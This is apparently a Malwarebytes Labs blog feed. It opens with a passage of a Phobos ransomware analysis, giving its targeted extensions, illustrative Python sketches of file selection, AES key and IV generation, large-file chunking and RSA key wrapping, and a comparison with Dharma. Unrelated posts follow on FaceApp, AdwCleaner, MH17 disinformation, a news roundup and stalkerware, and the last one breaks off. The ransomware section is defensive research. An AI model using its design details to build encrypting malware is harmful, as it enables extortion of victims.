1cd 3ds 3fr 3g2 3gp 7z accda accdb accdc accde accdt accdw adb adp ai ai3 ai4 ai5 ai6 ai7 ai8 anim arw as asa asc ascx asm asmx asp aspx asr asx avi avs backup bak bay bd bin bmp bz2 c cdr cer cf cfc cfm cfml cfu chm cin class clx config cpp cr2 crt crw cs css csv cub dae dat db dbf dbx dc3 dcm dcr der dib dic dif divx djvu dng doc docm docx dot dotm dotx dpx dqy dsn dt dtd dwg dwt dx dxf edml efd elf emf emz epf eps epsf epsp erf exr f4v fido flm flv frm fxg geo gif grs gz h hdr hpp hta htc htm html icb ics iff inc indd ini iqy j2c j2k java jp2 jpc jpe jpeg jpf jpg jpx js jsf json jsp kdc kmz kwm lasso lbi lgf lgp log m1v m4a m4v max md mda mdb mde mdf mdw mef mft mfw mht mhtml mka mkidx mkv mos mov mp3 mp4 mpeg mpg mpv mrw msg mxl myd myi nef nrw obj odb odc odm odp ods oft one onepkg onetoc2 opt oqy orf p12 p7b p7c pam pbm pct pcx pdd pdf pdp pef pem pff pfm pfx pgm php php3 php4 php5 phtml pict pl pls pm png pnm pot potm potx ppa ppam ppm pps ppsm ppt pptm pptx prn ps psb psd pst ptx pub pwm pxr py qt r3d raf rar raw rdf rgbe rle rqy rss rtf rw2 rwl safe sct sdpx shtm shtml slk sln sql sr2 srf srw ssi st stm svg svgz swf tab tar tbb tbi tbk tdi tga thmx tif tiff tld torrent tpl txt u3d udl uxdc vb vbs vcs vda vdr vdw vdx vrp vsd vss vst vsw vsx vtm vtml vtx wb2 wav wbm wbmp wim wmf wml wmv wpd wps x3f xl xla xlam xlk xlm xls xlsb xlsm xlsx xlt xltm xltx xlw xml xps xsd xsf xsl xslt xsn xtp xtp2 xyze xz zip
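Putting the hardcoded lists together, the selection logic can be sketched as follows (all three sets are abbreviated stand-ins for the real decrypted lists):

```python
# Abbreviated stand-ins for the decrypted whitelist/blacklists described above.
WHITELISTED_EXTENSIONS = {"doc", "jpg", "txt", "xls", "zip"}
SKIPPED_NAMES = {"info.txt", "info.hta"}   # Phobos' own ransom notes
SKIPPED_DIRECTORIES = {"c:\\windows"}

def should_encrypt(directory: str, filename: str) -> bool:
    """Decide whether a file would be selected for encryption."""
    if directory.lower() in SKIPPED_DIRECTORIES:
        return False
    if filename.lower() in SKIPPED_NAMES:
        return False
    extension = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return extension in WHITELISTED_EXTENSIONS
```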

How does the encryption work

Phobos uses the Windows Crypto API for the encryption of files. Several parallel threads deploy the encryption on each accessible disk or network share.

Deploying the encrypting thread

The AES key is created before the encrypting thread is run, and it is passed in the thread's parameter.

Fragment of the key generation function:

Calling the function generating the AES key (32 bytes)

Although the AES key is common to all the files encrypted in a single round, each file is encrypted with a different initialization vector. The initialization vector is 16 bytes long, generated just before the file is opened, and then passed to the encrypting function:

Calling the function generating the AES IV (16 bytes)

Under the hood, the AES key and the initialization vector are both generated by the same function, which is a wrapper around CryptGenRandom (a cryptographically strong random generator):
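The same pattern can be sketched with Python's standard-library CSPRNG standing in for CryptGenRandom: one 32-byte key per encryption round, and a fresh 16-byte IV for every file:

```python
import secrets  # stdlib CSPRNG, standing in for CryptGenRandom

round_key = secrets.token_bytes(32)   # shared by all files in this round

def iv_for_next_file() -> bytes:
    """A unique IV is generated just before each file is opened."""
    return secrets.token_bytes(16)
```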

The AES IV is later appended to the content of the encrypted file in cleartext form. We can see it in the following example:

Before the file encryption function is executed, the random IV is generated:

The AES key that was passed to the thread is imported into the context (CryptImportKey), and the IV is set. We can see that the file content that was read is encrypted:

After the content of the file is encrypted, it is saved into a newly created file with the ransomware's extension.

The ransomware creates a block with metadata, including checksums and the original file name. After this block, the random IV is stored, and finally, the block containing the encrypted AES key. The last element is the file marker: “LOCK96”:

Before being written to the file, the metadata block is encrypted using the same AES key and IV as the file content.

setting the AES key before encrypting the metadata block

Encrypted metadata block:

Finally, the content is appended to the end of the newly created file:

As ransomware researchers, the common question we want to answer is whether or not the ransomware is decryptable – that is, whether it contains a weakness allowing the files to be recovered without paying the ransom. The first thing to look at is how the encryption of the files is implemented. Unfortunately, as we can see from the above analysis, the encryption algorithm used is secure: AES with a random key and initialization vector, both created by a secure random generator. The implementation used is also valid: the authors decided to rely on the Windows Crypto API.

Encrypting big files

Phobos uses a different algorithm to encrypt big files (above 0x180000 bytes). The algorithm explained above is used for files of typical size, in which case the full file is encrypted from beginning to end. For big files, the main algorithm is similar; however, only some parts of the content are selected for encryption.

We can see this in the following example. The file ‘test.bin’ was filled with 0xAA bytes. Its original size was 0x77F87FF:

After being encrypted with Phobos, we see the following changes:

Some fragments of the file have been left unencrypted. Between them, starting from the beginning, some fragments are wiped. A random-looking block of bytes has been appended to the end of the file, after the original size; we can guess that this is the encrypted content of the wiped fragments. At the very end of the file, we can see a block of data typical for Phobos:

Looking inside, we can see the reason for this alignment. Only three chunks of the large file are read into a buffer, each 0x40000 bytes long:

All the chunks that were read are merged into one buffer. After this content, the usual metadata (checksums, original file name) is added, and the full buffer is encrypted:
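The chunk selection can be sketched as below. The chunk size, chunk count, and size threshold match the analysis, but the exact offsets chosen by Phobos are not reproduced here, so evenly spaced offsets are used purely for illustration:

```python
# Values taken from the analysis above; offsets are illustrative only.
CHUNK_SIZE = 0x40000
NUM_CHUNKS = 3
BIG_FILE_THRESHOLD = 0x180000

def regions_to_encrypt(file_size: int):
    """Return (offset, length) pairs that would be read for encryption."""
    if file_size < BIG_FILE_THRESHOLD:
        return [(0, file_size)]                      # small file: encrypt everything
    step = file_size // NUM_CHUNKS                   # illustrative spacing only
    return [(i * step, CHUNK_SIZE) for i in range(NUM_CHUNKS)]
```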

In this way, the authors of Phobos tried to minimize the time taken to encrypt large files while maximizing the damage done.

How is the AES key protected

The next element we need to check in order to assess decryptability is the way in which the authors decided to store the generated key.

In the case of Phobos, the AES key is encrypted just after being created. Its encrypted form is later appended to the end of the attacked file (in the aforementioned 128-byte block). Let’s take a closer look at the function responsible for encrypting the AES key.

The function generating and protecting the AES key is deployed before each encrypting thread is started. Looking inside, we can see that several variables are first decrypted, in the same way as the aforementioned strings.

Decryption of the constants

One of the decrypted elements is the following buffer:

It turns out that the decrypted 128-byte block is a public RSA key of the attacker. This buffer is then verified with the help of a checksum: a checksum of the RSA key is compared with a hardcoded one. If they match, the size used for AES key generation is set to 32; otherwise, it is set to 4.

Then, a buffer of random bytes is generated for the AES key.

After being generated, the AES key is protected with the help of the hardcoded public key. This time, the authors decided not to use the Windows Crypto API, but an external library. Detailed analysis helped us identify it as a specific implementation of the RSA algorithm (special thanks to Mark Lechtik for the help).

The decrypted 128-byte RSA key is imported with the help of the function RSA_pub_key_new. After that, the imported RSA key is used to encrypt the random AES key:
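The hybrid scheme can be shown in miniature. The sketch below uses textbook (unpadded) RSA with a toy key pair, encrypting the AES key byte by byte; the real sample uses a 1024-bit key and a statically linked RSA library:

```python
import secrets

# Toy RSA parameters for illustration only (the real sample embeds a
# 1024-bit public key).
N, E = 3233, 17      # public key: modulus (61 * 53) and exponent
D = 2753             # matching private exponent, kept only to verify the demo

aes_key = secrets.token_bytes(32)                    # per-round AES key
protected = [pow(b, E, N) for b in aes_key]          # what would land in the file
recovered = bytes(pow(c, D, N) for c in protected)   # attacker-side decryption
assert recovered == aes_key
```

Only the holder of the private exponent (the attacker) can reverse the protection, which is why the key stored in the file is useless to the victim.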

Summing up, the AES key seems to be protected correctly, which is bad news for the victims of this ransomware.

Attacking network shares

Phobos has a separate thread dedicated to attacking network shares.

Network shares are enumerated in a loop:

Comparison with Dharma

Previous sources have referenced Phobos as strongly based on Dharma ransomware. However, that comparison was based mostly on outward appearance: a very similar ransom note and the naming convention used for the encrypted files. The real answer lies in the code. Let’s have a look at both and compare them. This comparison is based on the current sample of Phobos and a Dharma sample (d50f69f0d3a73c0a58d2ad08aedac1c8).

If we compare both with the help of BinDiff, we can see some similarities, but also a lot of mismatching functions.

Fragment of code comparison: Phobos vs Dharma

In contrast to Phobos, Dharma loads the majority of its imports dynamically, making the code a bit more difficult to analyze.

Dharma loads most of its imports at the beginning of execution

Addresses of the imported functions are stored in an additional array, and every call takes an additional jump through this array. Example:

In contrast, Phobos has a typical, unobfuscated import table.

Before the encryption routine is started, Dharma sets a mutex: “Global\syncronize_<hardcoded ID>”.

Both Phobos and Dharma use the same implementation of the RSA algorithm, from a static library. Fragment of code from Dharma:

The fragment of the function “bi_mod_power”:

File encryption is implemented similarly in both. However, while Dharma uses AES implementation from the same static library, Phobos uses AES from Windows Crypto API.

Fragment of the AES implementation from Dharma ransomware

Looking at how the key is saved in the file, we can also see some similarities. The protected AES key is stored in a block at the end of the encrypted file. At the beginning of this block, we can see metadata similar to Phobos’, for example the original file name (in Phobos, this data is encrypted). Then there is a 6-character identifier, selected from a hardcoded pool.

The block at the end of a file encrypted by Dharma

Such an identifier also occurs in Phobos, but there it is stored at the very end of the block. In the case of Phobos, this identifier is constant for a particular sample.

The block at the end of a file encrypted by Phobos

Conclusion

Phobos is an average ransomware, by no means showing any novelty. Looking at its internals, we can conclude that while it is not an exact rip-off of Dharma, there are significant similarities between the two, suggesting the same authors. The overlaps are at the conceptual level, as well as in the same RSA implementation being used.

As with other threats, it is important to make sure your assets are secure to prevent such compromises. In this particular case, businesses should review any machines where Remote Desktop Protocol (RDP) access has been enabled and either disable it if it is not needed, or make sure the credentials are strong enough to withstand attacks such as brute-forcing.

Malwarebytes for business protects against Phobos ransomware via its Anti-Ransomware protection module:

The post A deep dive into Phobos ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FaceApp scares point to larger data collection problems

Malwarebytes - Wed, 07/24/2019 - 16:38

Last week, if you thumbed your way through Facebook, Instagram, and Twitter, you likely saw altered photos of your friends with a few extra decades written onto their faces—wrinkles added, skin sagged, hair bereft of color.

Has 2019 really been that long? Not really.

The photos are the work of FaceApp, the wildly popular, AI-powered app that lets users “age” pictures of themselves, change their hairstyles, put on glasses, and present a different gender.

Then, seemingly overnight, users, media reports, and members of Congress turned FaceApp into the latest privacy parable: If you care about your online privacy, avoid this app at all costs, they said.  

It’s operated by the Russian government, suggested the investigative outlet Forensic News.

It’s a coverup to train advanced facial recognition software, theorized multiple Twitter users.

It’s worthy of an FBI investigation, said Senator Chuck Schumer of New York.

The truth is less salacious. Here’s what we do know.

FaceApp’s engineers work out of St. Petersburg, Russia, which is not by any means a mark against the company. FaceApp does not, as previously claimed, upload a user’s entire photo roll to servers anywhere in the world. FaceApp’s Terms of Service agreement does not claim to transfer the ownership of a user’s photos to the company, and FaceApp’s CEO said the company would soon update its agreement to more accurately describe that the company does not utilize user content for “commercial purposes.”

Finally, the blowback against FaceApp—for what the company could collect, per its privacy policy, and how it could use that data—is a bit skewed. Countless American companies allow themselves to do the same exact thing today.

“The language you quoted to me, I recommend you look at the terms on Facebook or any other sort of user-generated service, like YouTube,” said Mitch Stoltz, senior staff attorney at Electronic Frontier Foundation, when we read FaceApp’s agreement to him over the phone.  

“It’s almost word-for-word,” Stoltz said. “All that verbiage, in a vacuum, sounds broad, but if you think about it, those are the terms used by almost any website that allows users to upload photos.”

But the takeaway from this week of near-hysteria should not be complacency. Instead, the story of FaceApp should serve as yet another example supporting the always-relevant, sometimes-boring guideline for online privacy: Ask questions first, download later (if at all).

FaceApp’s terms of service agreement

When users download and use FaceApp, they are required to agree to the parent company’s broad Terms of Service agreement. Those terms are extensive:

“You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you.”

Further, users are told through the Terms of Service agreement that “by using the Services, you agree that the User Content may be used for commercial purposes.”

This covers, to put it lightly, a lot. But it is far from unique, Stoltz said.  

“Any website that allows anyone in the world to post photos is going to have a clause like that—‘by uploading photos you give us permissions to do anything with it,’” Stoltz said. “It protects them against all manner of users trying to bring legal claims, where, oh, they only wanted four copies of a photo, not 10 copies. The possibilities are endless.”

Several years ago, CNN dug through some of the most dictatorial terms of service agreements for popular social media platforms, Internet services, and companies, and found that, for example, LinkedIn claimed it could profit from users’ ideas.

Relatedly, Terms of Service, Didn’t Read, which evaluates companies’ user agreements, currently shows that Google and Facebook can use users’ identities in advertisements shown to other users, and that the two companies can also track your online activity across other websites.

Stoltz also clarified that FaceApp’s Terms of Service agreement does not claim to take the copyright of a photo away from whoever took that photo—a process that would be difficult to do in a contract.

“It’s been tried—it’s something the courts don’t like,” Stoltz said.

Stoltz also said that, while consumers do have the option to bring a legal challenge against a contract they allege is unfair, such successful challenges are rare. Stoltz gave one example of where that worked, though: a judge sided with a rental car customer who challenged a company’s extra charge every time the driver sped past the speed limit.

“The court said nuh-uh, you can’t bury that in a contract and expect people to fully understand that,” Stoltz said.

As to how FaceApp will actually use user-generated photos, FaceApp CEO Yaroslav Goncharov told Malwarebytes Labs in an email that the company plans to update its terms to better reflect that it does not use any users’ images for “commercial purposes.”

“Even though our policy reserves potential ‘commercial use,’ we don’t use it for any commercial purposes,” Goncharov said. “We are planning to update our privacy policy and TC to reflect this fact.”

Dispelling the rumors

On July 17, United States Sen. Schumer asked the FBI and the Federal Trade Commission to investigate FaceApp because of the app’s popularity, the location of its parent company, and its alleged potential link to foreign intelligence operations in Russia.

The next day, Sen. Schumer spoke directly to consumers in a video shared on Twitter, hammering on the same points:

“The risk that your facial data could also fall into the hands of something like Russian intelligence, or the Russian military apparatus, is disturbing,” Schumer said.

But, according to FaceApp’s CEO, that isn’t true. In responding to questions from The Washington Post, Goncharov said the Russian government has no access to user photos, and, further, that unless a user actually lives in Russia, user data is not located in the country.

Goncharov also told The Washington Post that user photos processed by FaceApp are stored on servers run by Google and Amazon.

In responding to questions from Malwarebytes Labs, Goncharov clarified that the company removes photos from those servers based on a timer, but that sometimes, if there is a large quantity of photos, the removal process can actually take longer than the chosen time limit itself.

“You can set a policy for an [Amazon Simple Storage] bucket that says ‘delete all files that are older than one day.’ In this case, almost all photos may be deleted in 25 hours or so. However, if you have too many incoming photos it can take longer than one hour (or even 24 hours) to delete all photos that are older than 24 hours,” Goncharov said. “[Amazon Web Services] doesn’t provide a guarantee that it takes less than a day to complete a bucket policy. We have a similar situation with Google Cloud.”
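The kind of rule Goncharov describes corresponds to an S3 lifecycle configuration. Here is a sketch of such a rule, expressed as the configuration dict that boto3's put_bucket_lifecycle_configuration accepts (the rule ID is a hypothetical placeholder):

```python
# Illustrative S3 lifecycle configuration: expire every object after one day.
lifecycle_config = {
    "Rules": [
        {
            "ID": "expire-uploaded-photos",      # hypothetical rule name
            "Status": "Enabled",
            "Filter": {"Prefix": ""},            # apply to every object in the bucket
            "Expiration": {"Days": 1},           # delete objects older than one day
        }
    ]
}
```

As Goncharov notes, expiration is applied asynchronously, so objects can outlive the one-day mark until the rule is actually evaluated.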

Another concern that some users raised about FaceApp was the possibility that the app was accessing and downloading every photo locally stored on a user’s device.

But, again, the rumors proved to be overblown. Cybersecurity researchers and an investigation by Buzzfeed News revealed that the network traffic between FaceApp and its servers did not show any nefarious hoovering of user data.

“We didn’t see any suspicious increase in the size of outbound traffic that would indicate a leak of data beyond permitted uploads,” Buzzfeed News wrote. “We uploaded four pictures to FaceApp, which corresponds with the four spikes in the graphic, with some noise at the end after the fourth upload.”

Finally, despite the many distressed comments on Twitter, Goncharov also told The Washington Post that his company is not using its technology for any facial recognition purposes.

What you should do

We get it—FaceApp is fun. Sadly, for many, online privacy is less so. (We disagree.) But that does not make online privacy any less important.

For those of you who have already downloaded and used FaceApp, the company recently described an ad-hoc method for removing your data from their servers:

“We accept requests from users for removing all their data from our servers. Our support team is currently overloaded, but these requests have our priority. For the fastest processing, we recommend sending the requests from the FaceApp mobile app using ‘Settings->Support->Report a bug’ with the word ‘privacy’ in the subject line. We are working on the better UI for that.”

For those of you who want to avoid these types of problems in the future, there’s a simple rule: Read an app’s terms of service agreement and privacy policy before you download and use it. If the agreements and policies are too long to read through—or too filled with jargon to parse—you can always avoid downloading the app altogether.

Always remember, the fear of missing out on the latest online craze should be weighed against the fear of having your online privacy potentially invaded.

The post FaceApp scares point to larger data collection problems appeared first on Malwarebytes Labs.


Your device, your choice: AdwCleaner now detects preinstalled software

Malwarebytes - Tue, 07/23/2019 - 21:40

For years, Malwarebytes has held firm to a core belief about you, the user: You should be able to decide for yourself which apps, programs, browsers, and other software end up on your computer, tablet, or mobile phone.

Basically, it’s your device, your choice.

With the latest update to Malwarebytes AdwCleaner, we are working to further cement that belief into reality. AdwCleaner 7.4.0 now detects preinstalled software.

What is preinstalled software? Preinstalled software is software that typically comes pre-loaded on a new computer separate from the operating system. Most preinstalled software is not necessary for the proper functioning of your computer. In fact, in some cases, it may have the negative effect of impacting the computer’s performance by using memory, CPU, and hard drive resources. 

Preinstalled software can be the manufacturer-provided systems control panel. It can be the long-outdated antivirus scanner. It can be the never-heard-of photo editor, the wedged-in social gaming platform, the all-too-sticky online comparison shopper. 

So, why remove it? Besides the potential for performance impacts, we simply feel that when you buy a device—whether that’s a laptop for school, work, or fun—you should have the right to choose which programs are installed. That right should also apply to the types of software that can show up preinstalled with a device, before you even had a say in the matter.

Preinstalled software applications can be difficult to remove. They linger, buzzing around your digital environment while dodging simple uninstall attempts. We want to change that.

We also want to be clear here: Preinstalled software is not malicious. Instead, for some users, preinstalled applications serve more as an annoyance.

Advanced users typically prefer to remove all non-essential applications from their systems. With the latest version of AdwCleaner, we extend that capability to users of all technical abilities. AdwCleaner now allows users the option to quarantine and uninstall unnecessary, sometimes performance-degrading, preinstalled applications.

Is there a pre-packaged app that is not necessary for your machine to run? You have the option to get rid of it. Is there a pre-installed, superfluous program taking up vital space on your computer? Feel free to get rid of it.

And if you remove a preinstalled application by mistake, the newest version of AdwCleaner allows you to restore it completely from the quarantine.

You should be able to choose the programs that end up on your device. With the latest update to Malwarebytes AdwCleaner, that choice is in closer reach.

The post Your device, your choice: AdwCleaner now detects preinstalled software appeared first on Malwarebytes Labs.


Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach

Malwarebytes - Tue, 07/23/2019 - 15:54

A little background: on July 17, 2014, Malaysia Airlines Flight 17 was shot from the sky on its way from Amsterdam to Kuala Lumpur above the Ukraine. The plane was hit by a surface-to-air missile, and as a result, all 298 people on board were killed.

At that time, there was a revolt of pro-Russian militants against the Ukrainian government. Both the Ukrainian military and the separatists denied responsibility for the incident. After investigation of the crash site and reconstruction of the plane wreck, it was determined that the missile was fired from a BUK air defense missile system.

The BUK systems originated from the former Soviet Union but are in use by several countries. Three military forces in the region possessed the weaponry identified as the cause of the damage. (There were also Russian forces in the region, serving as “advisors” to the separatists.) For this reason, it was difficult to investigate who was responsible for the attack.

Here’s where cybersecurity comes into play. Social media and leaked data played an important role in this investigation. And they also play an important role in the propaganda that the Russians used, and are continuing to use, to invalidate the methods and results of the investigation.

By following the cybersecurity breadcrumbs, we can determine which information released online is legitimate and which is deliberate disinformation. However, most casual readers don’t go that far—or can’t—as they don’t have the technical capability to validate information sources.

How can they (we) sort out fiction from fact? Here’s what we know about the investigation into MH17, Russian disinformation, and which countermeasures can be put in place to fight online propaganda.

The investigation

On June 19, 2019, the Joint Investigation Team (JIT) that was set up to investigate this incident issued warrants for four individuals it holds responsible: three Ukrainian nationals and one Russian national. They were not the crew of the BUK missile launcher, but the men believed to be behind the transport and deployment of the Russian BUK missile launcher.

The Netherlands had already held Russia responsible at an earlier stage of the investigation because they found sufficient information to show that the BUK launcher originated from Russia and was manned by Russian soldiers. Both the Ukraine and Russia have laws against extradition of their nationals, so the chances of hearing from the suspects are slim-to-none. So how can we learn exactly what happened?

Finding information

Immediately after the incident, the JIT started saving 350 million webpages with information about the region where the incident took place. These pages were saved because important information could otherwise be lost or removed. By using photos and videos posted on social media, they were able to trace back the route the BUK system took to reach the place from which the fatal missile was launched.

Dashcams are immensely popular in Russia and surrounding countries because they provide evidence in insurance claims, so there was a lot of material available to work with. And the multitude of independent sources made it hard to contradict the conclusions. Also, part of the route could be confirmed by using satellite images made by Digital Globe for Google Earth.

By using VKontakte (a Russian social media platform much like Facebook), a Bellingcat researcher was able to reconstruct the crew that manned the BUK system at the time of the incident. And the Ukrainian secret security service (SBU) gladly provided wiretaps of pro-Russian separatists “ordering” a BUK system and coordinating the transport to the Ukraine. Bellingcat was even able to retrieve a traffic violation record confirming the location of one of the vehicles accompanying the BUK system.

Because Bellingcat is a private organization, it has fewer rules and regulations to follow than the official investigation team (JIT), which gives it an edge when it comes to using certain sources of information. If you are interested in the information they found, and especially how they found it, you really should read their full report.

If nothing else, it shows how a determined group of people can use all the little pieces of information you leave behind online to draw a pretty comprehensive picture. In fact, researchers have reasons to believe that Bellingcat was stirring up enough dirt to become the target of a spear-phishing attack attributed to the Russian group Fancy Bear APT.

These attacks are suspected to have been attempts to take over Bellingcat accounts enabling the Russians to create even more confusion. The Dutch team that investigated the incident scene reported phishing and hacking attempts as well.

Creating disinformation

Russia has a special disinformation department called the Internet Research Agency (IRA), headquartered in St. Petersburg. It launched an orchestrated campaign to pin the blame for the incident on the Ukrainian military.

While the IRA would love to influence international opinion about what happened to MH17, there’s far too much information (read: facts) out there that would prove it wrong. Instead, it focuses on its domestic audience to influence the country’s own public opinion. Knowing that their government shot down a commercial airliner would not go down well. So blogs were written that blamed the Ukrainian military, and many thousands of fake accounts started pointing to those blogs. In the first two days after the disaster alone, this amounted to 66,000 Tweets.

Every time the JIT issued new information about their findings, the IRA started a new campaign with “alternative” information. This prolonged campaign and the sheer mass of disinformation did have one advantage. The platforms that the IRA used were able to gather a lot of information about the operation and link the social media accounts that were involved.

In 2018, Twitter issued an update mentioning the IRA as it removed almost 4,000 Russian accounts believed to be associated with the group, which had amassed:

10 million Tweets and 2 million images, GIFs, videos, and Periscope broadcasts

Twitter certainly wasn’t the only platform the IRA used to spread disinformation, but it’s the only platform that disclosed its information about the “fake news factory.” You can find the same disinformation posted on Facebook, VKontakte, and in the comments sections of many websites.

Their goal is simple. When the public reads 20 different stories about the same news item, they no longer know which one to believe. One interesting version promoted by the IRA was that the BUK missile must have been intended for a plane carrying Russian president Putin, which had supposedly passed through the area shortly before the incident. It’s easy to track down information proving that this wasn’t true, but most readers won’t go that far.

Yet another conspiracy theory linked the Ukrainian military with Western governments. Russia has a long history of conspiracy theories that are used both to entertain the audience and to lead them away from reality.

Countermeasures against disinformation

Since 2016, the US has become aware of Russian interference in online information, communications, and even elections—but we haven’t found a surefire fix for fake news. Europe caught on a bit earlier, but for those intent on undermining democracies, a simple piece of disinformation can unravel hundreds of years of progress.

Before the United States figured out how to respond and while Europe was cautiously evaluating the online landscape, their adversaries were able to evolve and advance their disinformation techniques. Russia is not alone: there are other nations that would like to see democratic societies upended. Iran, North Korea, and China are learning from the Russians how to play the game of disinformation.

Obvious methods to counter the possible influence of disinformation are education, finding trusted sources, and transparency. But even in a democracy, these are not always the first resort for those in powerful positions.

Education empowers people to make up their own mind based on gathered information. Transparency gives them the tools to make decisions based on facts and not fiction. And finding trusted sources means first digging deep into their backgrounds, learning whether their methods of reporting are honorable, and establishing a consistent pattern of truth-telling.

You can ask yourself whether it is a good strategy to rely on the self-moderation that has been imposed on social media platforms, but at the moment this is our first line of defense. US Congress has prepared legislation that would increase ad transparency, govern data use, and establish an interagency fusion cell to coordinate government responses against disinformation, but these are all laws waiting to be passed for now.

Unlimited research

Another question this matter reflexively brings up is how we can raise the effectiveness of official investigators like the JIT to the level of Bellingcat without giving them a free pass to hack their way into every imaginable system.

An official international “police force” might be needed to conduct investigations for the international courts that are already in place, with warrants to demand information from any source that might have it. However, this doesn’t work when suspects, such as those in the MH17 investigation, are shielded from the law as long as they stay in their own country.

We know the courts and investigators should be provided with more adequate ways to gather evidence, but this is no easy matter to solve without jeopardizing the very free will we are trying to protect. It will require a lot of diplomacy and negotiation if we ever want to achieve this.

A little warning

Since interest in this incident has risen again after the official disclosure of some of the main suspects, we may see a revival of MH17-related phishing campaigns. Previous campaigns posed as memorial sites for the victims but led visitors to fake sites that seduced them into allowing push notifications or downloading video players infected with PUPs or malware.

Stay on the lookout, as cybercriminals—whether of Russian origin or not—are always looking to capitalize on tantalizing news stories or moments of public confusion.

And when in doubt, the best advice we can give is to be cautious when exploring the Internet and to view any information you read with a skeptical eye. Find your trusted sources, educate yourself, and look for those who are transparent.

Stay safe, everyone!

The post Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 15 – 21)

Malwarebytes - Mon, 07/22/2019 - 15:50

Last week on Malwarebytes Labs, we took an extensive look at Sodinokibi, one of the new ransomware strains found in the wild that many believe picked up where GandCrab left off. We also profiled Extenbro, a Trojan that protects adware; reported on the UK’s new Facebook ad reporting tool; homed in on new Magecart strategies that render them “bulletproof”; identified challenges faced by the education sector in the age of cybersecurity; and looked at how older generations keep up with the fast-paced evolution of tech.

Other cybersecurity news:
  • An exploit called Media File Jacking gives hackers access to the personal media files of WhatsApp and Telegram users, allowing for the interception, misuse, or manipulation of files. (Source: Venture Beat)
  • Remember the Zoom webcam vulnerability? RingCentral and Zhumu, two other video conferencing software programs, are also affected by the same flaw. (Source: BuzzFeed News)
  • A bug in Instagram that allows someone to bypass 2FA to hack any account was made public. Facebook quickly fixed the issue. (Source: Threatpost)
  • Sodinokibi isn’t the only ransomware borne from older ransomware. DoppelPaymer emerged from BitPaymer, too. (Source: Bleeping Computer)
  • Schools continue to be vulnerable on the cybersecurity side. And while ransomware is their current big problem, DDoS attacks are a close second. (Source: The Washington Post)
  • FaceApp has been in hot water these past few days due to its connection with Russia. The company broke its silence and denied storing users’ photographs without permission. (Source: The Guardian)
  • EvilGnome, a new backdoor, was found to target and spy on Linux users. (Source: Bleeping Computer)
  • To prove a point, researchers made an Android app that targets insulin pumps, either to withhold or give lethal dosages of insulin, threatening patient lives. (Source: WIRED)
  • Some browser extensions were found to have collected the browsing histories of millions of users. This gigantic leak is dubbed DataSpii, and both Chrome and Firefox users are affected. (Source: Ars Technica)
  • Meet Ke3chang, an APT group that is out to get diplomatic missions. (Source: ESET’s We Live Security Blog)

Stay safe, everyone!

The post A week in security (July 15 – 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Parental monitoring apps: How do they differ from stalkerware?

Malwarebytes - Mon, 07/22/2019 - 15:00

In late June, Malwarebytes revived its long-running campaign against a vicious type of malware in use today. This malware peers into text messages. It pinpoints victims’ movements across locations. It reveals browsing and search history. Often hidden from users, it removes their expectation of, and right to, privacy in the real world.

But after we recommitted our staunch opposition to this type of malware—called stalkerware—we received questions about something else: Parental monitoring apps.

The capabilities between the two often overlap.

TeenSafe, which retooled its product to focus on safe driving, previously let parents read their children’s text messages. Qustodio, recommended by the Wirecutter for parents who want to limit their children’s device usage, lets parents track their kids’ locations. Kidguard, clearly named and advertised as a child safety app, lets parents view their children’s browsing and search history.

Quickly, the line becomes blurred. What are the differences between stalkerware apps and parental monitoring apps? What is an “acceptable” or “safe” parental monitoring app? And how can a parent know whether they’re downloading a “legitimate” parental monitoring app instead of a stalkerware app merely disguised as a tool for parents?

Malwarebytes Labs is not here to tell people how to parent their children. We are here to investigate, report, and inform.

Knowing what we do about parental monitoring apps—their capabilities, their cybersecurity vulnerabilities, and their privacy implications—our safest recommendation is to avoid these apps.

However, we understand the digital challenges facing parents today. Cyberbullying remains a constant concern, violent images and videos proliferate online, and extremist content lingers across multiple platforms.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said she understands the appeal of these tools for parents. They advertise safety, she said.

“I believe that when parents are putting these apps on someone’s phone, they’re trying to do it to make their child safer,” Freed said. “They’re not saying ‘I don’t want my child to not have privacy.’ They think they’re doing the best they can to make this a safer place for their child.”

However, Freed explained, there is a lot to these apps that parents should know.

“Let’s assume that everyone is a good actor and wants to do the right thing,” Freed said. “But it is a matter of, is it clear to that parent what these apps are doing?”

What’s the difference?

Multiple privacy advocates and cybersecurity researchers said that, when comparing the technical capabilities of parental monitoring apps to those of stalkerware apps, the light that shines between the two is dim, if not entirely absent.

“Is there a line between legitimate monitoring apps and stalkerware apps?” said Cynthia Khoo, author of the CitizenLab report on stalkerware “Predator in Your Pocket.”

She answered her own question:

“On a technological level, no. There is no differentiation.”

Khoo explained that, when working with her co-authors on the Predator in Your Pocket paper, the team initially struggled with how to address monitoring applications that advertise themselves in benign, non-predatory ways, yet provide users with reams of sensitive information. It is the famous “dual-use” problem with stalkerware: some apps, though not advertised or designed for invasive monitoring, still provide the same capabilities.

That struggle disappeared though, Khoo said, when the team realized that apps could be evaluated by their capabilities, and whether those capabilities could violate the laws of Canada, where CitizenLab is located.

“We realized that if an app is not just providing location monitoring, if it’s collecting information from social media accounts, the private contents of someone’s phone—in Canadian law, that could be seen as unlawful interception of someone’s phone, unauthorized access to someone’s computer,” Khoo said. “Regardless of branding or marketing, that’s a criminal offense.”

Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

“If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,” Roane said. “Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.”

Roane continued: “We have to be very careful about the use of these by parents.”

Both Roane and Khoo also warned about the lack of consent allowed by many of these apps. Some stalkerware apps, like mSpy, FlexiSPY, and Hoverwatch, can operate entirely hidden from view, absent from a device’s app drawer.

Some parental monitoring apps offer the exact same feature.

Particularly concerning, we found that the app Kidguard actually reviewed the stalkerware app mSpy on its own website. In the list of pros and cons for mSpy, Kidguard listed the following as a positive:

